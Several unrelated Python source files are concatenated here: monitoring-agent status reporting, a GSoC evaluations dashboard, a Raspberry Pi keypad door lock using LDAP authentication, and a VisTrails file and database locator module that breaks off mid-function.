check_lines.extend(' ' + line for line in
s.traceback.split('\n'))
check_lines += [
" - Collected %s metric%s, %s event%s & %s service check%s" % (
cs.metric_count, plural(cs.metric_count),
cs.event_count, plural(cs.event_count),
cs.service_check_count, plural(cs.service_check_count)),
]
if cs.check_stats is not None:
check_lines += [
" - Stats: %s" % pretty_statistics(cs.check_stats)
]
if cs.library_versions is not None:
check_lines += [
" - Dependencies:"]
for library, version in cs.library_versions.iteritems():
check_lines += [
" - %s: %s" % (library, version)]
check_lines += [""]
lines += check_lines
# Metadata status
metadata_enabled = _is_affirmative(get_config().get('display_service_metadata', False))
if metadata_enabled:
lines += [
"",
"Service metadata",
"================",
""
]
if not check_statuses:
lines.append(" No checks have run yet.")
else:
meta_lines = []
for cs in check_statuses:
# Check title
check_line = [
' ' + cs.name,
' ' + '-' * len(cs.name)
]
instance_lines = []
for i, meta in enumerate(cs.service_metadata):
if not meta:
continue
instance_lines += [" - instance #%s:" % i]
for k, v in meta.iteritems():
instance_lines += [" - %s: %s" % (k, v)]
if instance_lines:
check_line += instance_lines
meta_lines += check_line
if meta_lines:
lines += meta_lines
else:
lines.append(" No metadata were collected.")
# Emitter status
lines += [
"",
"Emitters",
"========",
""
]
if not self.emitter_statuses:
lines.append(" No emitters have run yet.")
else:
for es in self.emitter_statuses:
c = 'green'
if es.has_error():
c = 'red'
line = " - %s [%s]" % (es.name, style(es.status, c))
if es.status != STATUS_OK:
line += ": %s" % es.error
lines.append(line)
return lines
def to_dict(self):
status_info = AgentStatus.to_dict(self)
# Hostnames
status_info['hostnames'] = {}
metadata_whitelist = [
'hostname',
'fqdn',
'ipv4',
'instance-id'
]
if self.host_metadata:
for key, host in self.host_metadata.iteritems():
for whitelist_item in metadata_whitelist:
if whitelist_item in key:
status_info['hostnames'][key] = host
break
# Checks.d Status
status_info['checks'] = {}
check_statuses = self.check_statuses + get_jmx_status()
for cs in check_statuses:
status_info['checks'][cs.name] = {'instances': {}}
if cs.init_failed_error:
status_info['checks'][cs.name]['init_failed'] = True
status_info['checks'][cs.name]['traceback'] = \
cs.init_failed_traceback or cs.init_failed_error
else:
status_info['checks'][cs.name] = {'instances': {}}
status_info['checks'][cs.name]['init_failed'] = False
for s in cs.instance_statuses:
status_info['checks'][cs.name]['instances'][s.instance_id] = {
'status': s.status,
'has_error': s.has_error(),
'has_warnings': s.has_warnings(),
}
if s.has_error():
status_info['checks'][cs.name]['instances'][s.instance_id]['error'] = s.error
if s.has_warnings():
status_info['checks'][cs.name]['instances'][s.instance_id]['warnings'] = s.warnings
status_info['checks'][cs.name]['metric_count'] = cs.metric_count
status_info['checks'][cs.name]['event_count'] = cs.event_count
status_info['checks'][cs.name]['service_check_count'] = cs.service_check_count
# Emitter status
status_info['emitter'] = []
for es in self.emitter_statuses:
check_status = {
'name': es.name,
'status': es.status,
'has_error': es.has_error(),
}
if es.has_error():
check_status['error'] = es.error
status_info['emitter'].append(check_status)
osname = config.get_os()
try:
status_info['confd_path'] = config.get_confd_path(osname)
except config.PathNotFound:
status_info['confd_path'] = 'Not found'
try:
status_info['checksd_path'] = config.get_checksd_path(osname)
except config.PathNotFound:
status_info['checksd_path'] = 'Not found'
# Clocks
try:
ntp_offset, ntp_style = get_ntp_info()
warn_ntp = len(ntp_style) > 0
status_info["ntp_offset"] = round(ntp_offset, 4)
except Exception as e:
ntp_offset = "Unknown (%s)" % str(e)
warn_ntp = True
status_info["ntp_offset"] = ntp_offset
status_info["ntp_warning"] = warn_ntp
status_info["utc_time"] = datetime.datetime.utcnow().__str__()
return status_info
class DogstatsdStatus(AgentStatus):
NAME = 'Dogstatsd'
def __init__(self, flush_count=0, packet_count=0, packets_per_second=0,
metric_count=0, event_count=0, service_check_count=0):
AgentStatus.__init__(self)
self.flush_count = flush_count
self.packet_count = packet_count
self.packets_per_second = packets_per_second
self.metric_count = metric_count
self.event_count = event_count
self.service_check_count = service_check_count
def has_error(self):
return self.flush_count == 0 and self.packet_count == 0 and self.metric_count == 0
def body_lines(self):
lines = [
"Flush count: %s" % self.flush_count,
"Packet Count: %s" % self.packet_count,
"Packets per second: %s" % self.packets_per_second,
"Metric count: %s" % self.metric_count,
"Event count: %s" % self.event_count,
"Service check count: %s" % self.service_check_count,
]
return lines
def to_dict(self):
status_info = AgentStatus.to_dict(self)
status_info.update({
'flush_count': self.flush_count,
'packet_count': self.packet_count,
'packets_per_second': self.packets_per_second,
'metric_count': self.metric_count,
'event_count': self.event_count,
'service_check_count': self.service_check_count,
})
return status_info
class ForwarderStatus(AgentStatus):
NAME = 'Forwarder'
def __init__(self, queue_length=0, queue_size=0, flush_count=0, transactions_received=0,
transactions_flushed=0, too_big_count=0):
AgentStatus.__init__(self)
self.queue_length = queue_length
self.queue_size = queue_size
self.flush_count = flush_count
self.transactions_received = transactions_received
self.transactions_flushed = transactions_flushed
self.hidden_username = None
self.hidden_password = None
self.too_big_count = too_big_count
def body_lines(self):
lines = [
"Queue Size: %s bytes" % self.queue_size,
"Queue Length: %s" % self.queue_length,
"Flush Count: %s" % self.flush_count,
"Transactions received: %s" % self.transactions_received,
"Transactions flushed: %s" % self.transactions_flushed,
"Transactions rejected: %s" % self.too_big_count,
""
]
return lines
def has_error(self):
return self.flush_count == 0
def to_dict(self):
status_info = AgentStatus.to_dict(self)
status_info.update({
'flush_count': self.flush_count,
'queue_length': self.queue_length,
'queue_size': self.queue_size,
'too_big_count': self.too_big_count,
'transactions_received': self.transactions_received,
'transactions_flushed': self.transactions_flushed
})
return status_info
def get_jmx_instance_status(instance_name, status, message, metric_count):
if status == STATUS_ERROR:
instance_status = InstanceStatus(instance_name, STATUS_ERROR, error=message, metric_count=metric_count)
elif status == STATUS_WARNING:
instance_status = InstanceStatus(instance_name, STATUS_WARNING, warnings=[message], metric_count=metric_count)
elif status == STATUS_OK:
instance_status = InstanceStatus(instance_name, STATUS_OK, metric_count=metric_count)
return instance_status
def get_jmx_status():
"""This function tries to read the 2 jmxfetch status file which are yaml file
located in the temp directory.
There are 2 files:
- One generated by the Agent itself, for jmx checks that can't be initialized because
there are missing stuff.
Its format is as following:
###
invalid_checks:
jmx: !!python/object/apply:jmxfetch.InvalidJMXConfiguration [You need to have at
least one instance defined in the YAML file for this check]
timestamp: 1391040927.136523
###
- One generated by jmxfetch that return information about the collection of metrics
its format is as following:
###
timestamp: 1391037347435
checks:
failed_checks:
jmx:
- {message: Unable to create instance. Please check your yaml file, status: ERROR}
initialized_checks:
tomcat:
- {message: null, status: OK, metric_count: 7, instance_name: jmx-remihakim.fr-3000}
###
"""
check_statuses = []
java_status_path = JMXFiles.get_status_file_path()
python_status_path = JMXFiles.get_python_status_file_path()
if not os.path.exists(java_status_path) and not os.path.exists(python_status_path):
log.debug("There is no jmx_status file at: %s or at: %s" % (java_status_path, python_status_path))
return []
check_data = defaultdict(lambda: defaultdict(list))
try:
if os.path.exists(java_status_path):
java_jmx_stats = yaml.load(file(java_status_path))
status_age = time.time() - java_jmx_stats.get('timestamp')/1000 # JMX timestamp is saved in milliseconds
jmx_checks = java_jmx_stats.get('checks', {})
if status_age > 60:
check_statuses.append(
CheckStatus("jmx", [
InstanceStatus(
0,
STATUS_ERROR,
error="JMXfetch didn't return any metrics during the last minute"
)
])
)
else:
for check_name, instances in jmx_checks.get('failed_checks', {}).iteritems():
for info in instances:
message = info.get('message', None)
metric_count = info.get('metric_count', 0)
service_check_count = info.get('service_check_count', 0)
status = info.get('status')
instance_name = info.get('instance_name', None)
check_data[check_name]['statuses'].append(get_jmx_instance_status(instance_name, status, message, metric_count))
check_data[check_name]['metric_count'].append(metric_count)
check_data[check_name]['service_check_count'].append(service_check_count)
for check_name, instances in jmx_checks.get('initialized_checks', {}).iteritems():
for info in instances:
message = info.get('message', None)
metric_count = info.get('metric_count', 0)
service_check_count = info.get('service_check_count', 0)
status = info.get('status')
instance_name = info.get('instance_name', None)
check_data[check_name]['statuses'].append(get_jmx_instance_status(instance_name, status, message, metric_count))
check_data[check_name]['metric_count'].append(metric_count)
check_data[check_name]['service_check_count'].append(service_check_count)
for check_name, data in check_data.iteritems():
check_status = CheckStatus(check_name, data['statuses'],
metric_count=sum(data['metric_count']),
service_check_count=sum(data['service_check_count']))
check_statuses.append(check_status)
if os.path.exists(python_status_path):
python_jmx_stats = yaml.load(file(python_status_path))
jmx_checks = python_jmx_stats.get('invalid_checks', {})
for check_name, excep in jmx_checks.iteritems():
check_statuses.append(CheckStatus(check_name, [], init_failed_error=excep))
return check_statuses
except Exception:
log.exception("Couldn't load latest jmx status")
return []
| |
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for the GSoC organization page listing all evaluations.
"""
from django.utils.dateformat import format
from django.utils.translation import ugettext
from soc.logic.exceptions import AccessViolation
from soc.views.helper import lists
from soc.views.helper import url_patterns
from soc.views.helper.surveys import dictForSurveyModel
from soc.modules.gsoc.logic import project as project_logic
from soc.modules.gsoc.logic.evaluations import evaluationRowAdder
from soc.modules.gsoc.logic.survey_record import getEvalRecord
from soc.modules.gsoc.models.grading_project_survey import GradingProjectSurvey
from soc.modules.gsoc.models.grading_project_survey_record import \
GSoCGradingProjectSurveyRecord
from soc.modules.gsoc.models.project import GSoCProject
from soc.modules.gsoc.models.project_survey import ProjectSurvey
from soc.modules.gsoc.models.project_survey_record import \
GSoCProjectSurveyRecord
from soc.modules.gsoc.views import dashboard
from soc.modules.gsoc.views.helper.url_patterns import url
DEF_NOT_ADMIN = ugettext(
'You must be an organization administrator for at least one '
'organization in the program to access this page.')
class StudentEvaluationComponent(dashboard.Component):
"""Component for listing student evaluations for organizations.
"""
def __init__(self, request, data, evals, idx):
"""Initializes this component.
Args:
request: The Django HTTP Request object
data: The RequestData object containing the entities from the request
evals: Dictionary containing evaluations for which the list must be built
idx: The id for this list component
"""
self.request = request
self.data = data
self.evals = evals
self.idx = idx
self.record = None
list_config = lists.ListConfiguration(add_key_column=False)
list_config.addColumn(
'key', 'Key',
(lambda ent, eval, *args: "%s/%s/%s" % (
eval, ent.parent().key().name(),
ent.key().id())), hidden=True)
list_config.addColumn(
'evaluation', 'Evaluation',
lambda ent, eval, *args: eval.capitalize() if eval else '')
list_config.addColumn(
'student', 'Student',
lambda entity, eval, *args: entity.parent().name())
list_config.addSimpleColumn('title', 'Project Title')
list_config.addColumn('org', 'Organization',
lambda entity, eval, *args: entity.org.name)
list_config.addColumn(
'mentors', 'Mentors',
lambda ent, eval, mentors, *args: ', '.join(
[mentors.get(m).name() for m in ent.mentors]))
list_config.addColumn(
'status', 'Status', self._getStatus)
list_config.addColumn(
'created', 'Submitted on',
lambda ent, eval, *args: format(
self.record.created, dashboard.DATETIME_FORMAT) if \
self.record else 'N/A')
list_config.addColumn(
'modified', 'Last modified on',
lambda ent, eval, *args: format(
self.record.modified, dashboard.DATETIME_FORMAT) if (
self.record and self.record.modified) else 'N/A')
list_config.setDefaultSort('student')
def getRowAction(entity, eval, *args):
eval_ent = self.evals.get(eval)
if not self.data.timeline.afterSurveyEnd(eval_ent):
return ''
url = self.data.redirect.survey_record(
eval, entity.key().id_or_name(),
entity.parent().link_id).urlOf('gsoc_show_student_evaluation')
return url
list_config.setRowAction(getRowAction)
self._list_config = list_config
def _getStatus(self, entity, eval, *args):
eval_ent = self.evals.get(eval)
self.record = getEvalRecord(GSoCProjectSurveyRecord, eval_ent, entity)
return dashboard.colorize(bool(self.record), "Submitted", "Not submitted")
def context(self):
list = lists.ListConfigurationResponse(
self.data, self._list_config, idx=self.idx, preload_list=False)
return {
'name': 'student_evaluations',
'lists': [list],
'title': 'Student Evaluations',
'description': ugettext('Student evaluations'),
'idx': self.idx,
}
def getListData(self):
"""Returns the list data as requested by the current request.
If the lists as requested is not supported by this component None is
returned.
"""
idx = lists.getListIndex(self.request)
if idx == self.idx:
list_query = project_logic.getProjectsQueryForEvalForOrgs(
orgs=self.data.org_admin_for)
starter = lists.keyStarter
prefetcher = lists.listModelPrefetcher(
GSoCProject, ['org'],
['mentors', 'failed_evaluations'],
parent=True)
row_adder = evaluationRowAdder(self.evals)
response_builder = lists.RawQueryContentResponseBuilder(
self.request, self._list_config, list_query,
starter, prefetcher=prefetcher, row_adder=row_adder)
return response_builder.build()
else:
return None
def templatePath(self):
return'v2/modules/gsoc/dashboard/list_component.html'
class MentorEvaluationComponent(StudentEvaluationComponent):
"""Component for listing mentor evaluations for organizations.
"""
def __init__(self, request, data, evals, idx):
"""Initializes this component.
Args:
request: The Django HTTP Request object
data: The RequestData object containing the entities from the request
evals: Dictionary containing evaluations for which the list must be built
idx: The id for this list component
"""
super(MentorEvaluationComponent, self).__init__(request, data, evals, idx)
self.record = None
self._list_config.addColumn(
'grade', 'Grade', self._getGrade)
self._list_config.setRowAction(lambda entity, eval, *args:
data.redirect.survey_record(
eval, entity.key().id_or_name(),
entity.parent().link_id).urlOf(
'gsoc_take_mentor_evaluation'))
def _getStatus(self, entity, eval, *args):
eval_ent = self.evals.get(eval)
self.record = getEvalRecord(GSoCGradingProjectSurveyRecord,
eval_ent, entity)
return dashboard.colorize(
bool(self.record), "Submitted", "Not submitted")
def _getGrade(self, entity, eval, *args):
if self.record:
return dashboard.colorize(
self.record.grade, "Pass", "Fail")
else:
return "N/A"
def context(self):
context = super(MentorEvaluationComponent, self).context()
context['title'] = 'Mentor Evaluations'
context['description'] = ugettext('Student evaluations')
context['name'] = 'mentor_evaluations'
return context
class Dashboard(dashboard.DashboardPage):
"""View for the list of all the organization related components.
"""
def djangoURLPatterns(self):
"""The URL pattern for the org evaluations.
"""
return [
url(r'dashboard/org/%s$' % url_patterns.PROGRAM, self,
name='gsoc_org_dashboard')]
def checkAccess(self):
"""Denies access if the user is not an org admin.
"""
self.check.isProfileActive()
if self.data.is_org_admin:
return
raise AccessViolation(DEF_NOT_ADMIN)
def components(self):
"""Returns the components that are active on the page.
"""
program = self.data.program
mentor_evals = dictForSurveyModel(GradingProjectSurvey, program,
['midterm', 'final'])
student_evals = dictForSurveyModel(ProjectSurvey, program,
['midterm', 'final'])
components = [
MentorEvaluationComponent(self.request, self.data, mentor_evals, 0),
StudentEvaluationComponent(self.request, self.data, student_evals, 1)]
return components
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
c-lab schloss
Usage:
schloss.py [--theme <theme>]
schloss.py (-h | --help)
schloss.py --version
Options:
-h --help Show this screen.
--version Show version.
--theme=<theme> Sound theme [default: default].
"""
import os
import time
import random
import subprocess
from queue import Queue
from threading import Thread, RLock
from docopt import docopt
from RPi import GPIO
from ldap_interface import authenticate
__version__ = '0.1.0'
GPIO.setwarnings(False)
NUMERIC_KEYS = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
BOUNCE_TIME = 300 # in milliseconds
STALE_TIMEOUT = 30 # in seconds
timeouts = {'1': BOUNCE_TIME, '2': BOUNCE_TIME, '3': BOUNCE_TIME, '4': BOUNCE_TIME,
'5': BOUNCE_TIME, '6': BOUNCE_TIME, '7': BOUNCE_TIME, '8': BOUNCE_TIME,
'9': BOUNCE_TIME, '0': BOUNCE_TIME, 'A': BOUNCE_TIME, 'B': BOUNCE_TIME,
'C': BOUNCE_TIME, 'D': BOUNCE_TIME, 'E': BOUNCE_TIME, 'F': BOUNCE_TIME}
Q = Queue()
LOCK = RLock()
ROWS = [11, 7, 5, 3]
COLS = [16, 12, 10, 8]
OPEN_PIN = 15
PLAYER = 'aplay'
MONGO = None
STATE = 0
UID = ''
PIN = ''
RESET_TIMER = STALE_TIMEOUT
def next_theme():
"""
Look into themes folder and find all installed themes. Get a random one which is not the current one.
"""
global THEME
themes = next(os.walk('/opt/raspberrylock/sounds/'))[1]
OLD_THEME = THEME
while THEME != OLD_THEME:
THEME = random.choice(themes)
def init_gpios():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(OPEN_PIN, GPIO.OUT)
GPIO.output(OPEN_PIN, 0)
for pin in ROWS:
GPIO.setup(pin, GPIO.OUT)
for pin in COLS:
GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
def decode_keypad(measurements):
"""
x1 = (0,0,1,0)
"""
layout = [['C', 'D', 'E', 'F'], ['B', '9', '6', '3'],
['0', '8', '5', '2'], ['A', '7', '4', '1']]
for y_index, y_row in enumerate(measurements):
for x_index, x_state in enumerate(y_row):
if x_state > 0:
return layout[y_index][x_index]
def decrease_timeouts(timeouts):
for k, v in timeouts.items():
if v > 0:
timeouts[k] = v - 1
return timeouts
def collect_measurements():
"""
"""
pin_state = []
for y_pin in ROWS:
GPIO.output(y_pin, 1)
x_pin_states = []
for x_pin in COLS:
pin_in = GPIO.input(x_pin)
# print("{}x{} = {}".format(y_pin, x_pin, pin_in))
x_pin_states.append(pin_in)
GPIO.output(y_pin, 0)
pin_state.append(x_pin_states)
return pin_state
def read_keypad():
decrease_timeouts(timeouts)
key = decode_keypad(collect_measurements())
if key:
if timeouts[key] > 0:
return None
else:
num = random.randint(0, 9)
subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/%s.wav' % (THEME, num)],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
timeouts[key] = BOUNCE_TIME
return key
else:
return None
def reset_state():
global STATE, UID, PIN
print("reset state")
STATE = 0
UID = ''
PIN = ''
def timeout_reset_state():
global RESET_TIMER
while True:
RESET_TIMER -= 1
if RESET_TIMER <= 0:
reset_state()
RESET_TIMER = STALE_TIMEOUT
time.sleep(1.0)
def control_loop():
global RESET_TIMER
global STATE, UID, PIN
reset_state()
# Main state machine.
# Expects the user to enter her UID, then PIN like this:
# [A] 2903 [A] 123456 A
# The first and second 'A' presses are optional and ignored for compatibility with the replicator.
# The second 'A' would be mandatory for a non-4-digit UID, luckily all c-base UIDs are 4-digit, though.
while True:
key = Q.get()
print('state={}, got symbol {}'.format(STATE, '#'))
RESET_TIMER = STALE_TIMEOUT
Q.task_done()
if STATE == 0:
if key == 'A':
# print('Enter UID:')
STATE = 0
continue
elif key == 'C':
reset_state()
continue
elif key in NUMERIC_KEYS:
UID += key
STATE = 1
continue
elif STATE == 1:
if key in NUMERIC_KEYS:
if len(UID) < 4:
UID += key
STATE = 1
else:
PIN += key
STATE = 2
continue
elif key == 'C':
reset_state()
continue
elif key == 'A':
STATE = 2
continue
elif STATE == 2:
if key in NUMERIC_KEYS:
PIN += key
continue
elif key == 'C':
reset_state()
continue
elif key == 'A':
t = Thread(target=open_if_correct, args=(UID, PIN))
t.start()
reset_state()
continue
def open_if_correct(uid, pin):
print('checking ldap ...')
if authenticate(uid, pin):
subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/success.wav' % THEME],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
next_theme()
with LOCK:
GPIO.output(OPEN_PIN, 1)
time.sleep(1)
GPIO.output(OPEN_PIN, 0)
time.sleep(13)
else:
subprocess.Popen([PLAYER, '/opt/raspberrylock/sounds/%s/fail.wav' % THEME],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
with LOCK:
time.sleep(2)
def keypad_loop():
while True:
with LOCK:
key = read_keypad()
if key:
Q.put(key)
def main():
# os.nice(10)
init_gpios()
control_thread = Thread(target=control_loop)
control_thread.start()
keypad_thread = Thread(target=keypad_loop)
keypad_thread.start()
timeout_thread = Thread(target=timeout_reset_state)
timeout_thread.start()
if __name__ == '__main__':
args = docopt(__doc__, version=__version__)
try:
main()
THEME = args['--theme']
except KeyboardInterrupt:
GPIO.cleanup()
| |
###############################################################################
##
## Copyright (C) 2014-2016, New York University.
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the New York University nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from __future__ import division
import base64
import getpass
import os.path
from vistrails.core import get_vistrails_application
from vistrails.core.configuration import get_vistrails_configuration
from vistrails.core.system import vistrails_default_file_type, get_elementtree_library, \
default_connections_file, vistrails_examples_directory, \
vistrails_root_directory
from vistrails.core.external_connection import ExtConnectionList, DBConnection
from vistrails.core.thumbnails import ThumbnailCache
from vistrails.core import debug
from vistrails.db.services.locator import XMLFileLocator as _XMLFileLocator, \
DBLocator as _DBLocator, ZIPFileLocator as _ZIPFileLocator, \
BaseLocator as _BaseLocator, UntitledLocator as _UntitledLocator
from vistrails.db.services.io import SaveBundle, test_db_connection
from vistrails.db import VistrailsDBException
from vistrails.db.domain import DBWorkflow
ElementTree = get_elementtree_library()
class BaseLocator(_BaseLocator):
@staticmethod
def convert_locator(locator):
if locator.__class__ == _XMLFileLocator:
locator.__class__ = XMLFileLocator
elif locator.__class__ == _ZIPFileLocator:
locator.__class__ = ZIPFileLocator
elif locator.__class__ == _DBLocator:
DBLocator.convert(locator)
elif locator.__class__ == _UntitledLocator:
locator.__class__ = UntitledLocator
@staticmethod
def from_url(url):
locator = _BaseLocator.from_url(url)
BaseLocator.convert_locator(locator)
return locator
class CoreLocator(object):
@staticmethod
def prompt_autosave(parent_widget):
pass # Opens a dialog that prompts the user if they want to
# use temporaries
@staticmethod
def load_from_gui(parent_widget, obj_type):
pass # Opens a dialog that the user will be able to use to
# show the right values, and returns a locator suitable
# for loading a file
@staticmethod
def save_from_gui(parent_widget, obj_type, locator):
pass # Opens a dialog that the user will be able to use to
# show the right values, and returns a locator suitable
# for saving a file
def update_from_gui(self, klass=None):
pass
# FIXME Need to do some more intelligent conversions anywhere this
# function gets called
@staticmethod
def get_convert_klass(vt_type):
from vistrails.core.vistrail.vistrail import Vistrail
from vistrails.core.vistrail.pipeline import Pipeline
from vistrails.core.log.log import Log
from vistrails.core.modules.module_registry import ModuleRegistry
from vistrails.core.log.opm_graph import OpmGraph
klass_map = {Vistrail.vtType: Vistrail,
Pipeline.vtType: Pipeline,
Log.vtType: Log,
ModuleRegistry.vtType: ModuleRegistry,
OpmGraph.vtType: OpmGraph}
return klass_map[vt_type]
class UntitledLocator(_UntitledLocator, CoreLocator):
def load(self, klass=None):
from vistrails.core.vistrail.vistrail import Vistrail
if klass is None:
klass = Vistrail
obj = _UntitledLocator.load(self, klass.vtType)
klass.convert(obj)
obj.locator = self
return obj
class XMLFileLocator(_XMLFileLocator, CoreLocator):
def __init__(self, filename, **kwargs):
_XMLFileLocator.__init__(self, filename, **kwargs)
def load(self, klass=None):
from vistrails.core.vistrail.vistrail import Vistrail
if klass is None:
klass = Vistrail
obj = _XMLFileLocator.load(self, klass.vtType)
klass.convert(obj)
obj.locator = self
return obj
def save(self, obj):
is_bundle = False
if type(obj) == type(SaveBundle(None)):
is_bundle = True
save_bundle = obj
obj = save_bundle.get_primary_obj()
klass = obj.__class__
obj = _XMLFileLocator.save(self, obj, False)
klass.convert(obj)
obj.locator = self
if is_bundle:
return SaveBundle(save_bundle.bundle_type, obj)
return obj
def save_as(self, obj, version=None):
is_bundle = False
if type(obj) == type(SaveBundle(None)):
is_bundle = True
save_bundle = obj
obj = save_bundle.get_primary_obj()
klass = obj.__class__
obj = _XMLFileLocator.save(self, obj, True, version)
klass.convert(obj)
obj.locator = self
if is_bundle:
return SaveBundle(save_bundle.bundle_type, obj)
return obj
##########################################################################
def __eq__(self, other):
if not isinstance(other, XMLFileLocator):
return False
return self._name == other._name
##########################################################################
@staticmethod
def prompt_autosave(parent_widget):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_autosave_prompt(parent_widget)
@staticmethod
def load_from_gui(parent_widget, obj_type):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)
@staticmethod
def save_from_gui(parent_widget, obj_type, locator=None):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
locator)
# def update_from_gui(self, parent_widget, klass=None):
# from core.vistrail.vistrail import Vistrail
# if klass is None:
# klass = Vistrail
# import gui.extras.core.db.locator as db_gui
# return db_gui.get_load_file_locator_from_gui(parent_widget, klass.vtType)
class DBLocator(_DBLocator, CoreLocator):
class getKeyChain(object):
def set_key(self, key, passwd):
get_vistrails_application().keyChain.set_key(key,passwd)
def get_key(self, key):
return get_vistrails_application().keyChain.get_key(key)
keyChain = getKeyChain()
def __init__(self, host, port, database, user, passwd, name=None,
**kwargs):
_DBLocator.__init__(self, host, port, database, user, passwd, name,
**kwargs)
self.__list = ExtConnectionList.getInstance(default_connections_file())
self.ext_connection_id = -1
def load(self, klass=None):
from vistrails.core.vistrail.vistrail import Vistrail
if klass is None:
klass = Vistrail
save_bundle = _DBLocator.load(self, klass.vtType, ThumbnailCache.getInstance().get_directory())
if klass.vtType == DBWorkflow.vtType:
wf = save_bundle
klass = self.get_convert_klass(wf.vtType)
klass.convert(wf)
wf.locator = self
return wf
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
return save_bundle
def save(self, save_bundle):
save_bundle = _DBLocator.save(self, save_bundle, False)
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
return save_bundle
def save_as(self, save_bundle, version=None):
save_bundle = _DBLocator.save(self, save_bundle, True, version)
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
# Need to copy images into thumbnail cache directory so references
# won't become invalid if they are in a temp dir that gets destroyed
# when the previous locator is closed
import shutil
thumb_cache = ThumbnailCache.getInstance()
thumb_cache_dir = thumb_cache.get_directory()
new_thumbnails = []
for thumbnail in save_bundle.thumbnails:
if os.path.dirname(thumbnail) == thumb_cache_dir:
new_thumbnails.append(thumbnail)
else:
cachedir_thumbnail = os.path.join(thumb_cache_dir, os.path.basename(thumbnail))
try:
shutil.copyfile(thumbnail, cachedir_thumbnail)
new_thumbnails.append(cachedir_thumbnail)
except Exception, e:
debug.critical("copying %s -> %s failed" % (
thumbnail, cachedir_thumbnail),
e)
save_bundle.thumbnails = new_thumbnails
# Need to update thumbnail cache in case some references have changed
thumb_cache.add_entries_from_files(save_bundle.thumbnails)
return save_bundle
def update_from_gui(self, parent_widget, klass=None):
from vistrails.core.vistrail.vistrail import Vistrail
import vistrails.gui.extras.core.db.locator as db_gui
if klass is None:
klass = Vistrail
config = self.find_connection_info(self._host, self._port, self._db)
if config is None or config['succeeded']==False:
config = db_gui.get_db_connection_from_gui(parent_widget,
-1,
"",
self._host,
self._port,
self._user,
self._passwd,
self._db)
if config is not None and config['succeeded'] == True:
self._host = config['host']
self._port = config['port']
self._db = config['db']
self._user = config['user']
self._passwd = config['passwd']
self.ext_connection_id = self.set_connection_info(**config)
return True
return False
def update_from_console(self):
config = self.find_connection_info(self._host, self._port, self._db)
if config is None:
# the problem here is if VisTrails is being run through command
# line from LaTex, stdout is being redirected to a log file, so
# the user does not see the prompt in raw_input. getpass uses the
# controlling terminal so it works fine. Just to make sure he sees
# the first message prompt we will the controlling terminal
try:
f= open('/dev/tty', 'w')
f.write("\nConnect to db with username [%s]: "%self._user)
f.close()
user = raw_input()
except IOError:
debug.warning("Couldn't write to terminal. Will try stdout")
user = raw_input("Connecting to db with username[%s]: "%self._user)
try:
if user != '':
self._user = user
passwd = getpass.getpass("password:")
self._passwd = passwd
config = {'host': self._host,
'port': int(self._port),
'user': self._user,
'passwd': self._passwd,
'db': self._db
}
test_db_connection(config)
config['succeeded'] = True
config['name'] = '%s@%s'%(self._user,self._host)
config['id'] = -1
except VistrailsDBException, e:
debug.critical('VisTrails DB Exception', e)
config['succeeded'] = False
except Exception, e2:
debug.critical('VisTrails Exception', e2)
config['succeeded'] = False
if config is not None:
if config['succeeded'] == False:
passwd = getpass.getpass("\nVisTrails DB password for user %s:"%config['user'])
self._user = config['user']
self._passwd = passwd
dbconfig = {'host': self._host,
'port': int(self._port),
'user': self._user,
'passwd': self._passwd,
'db': self._db
}
try:
test_db_connection(dbconfig)
config['succeeded'] = True
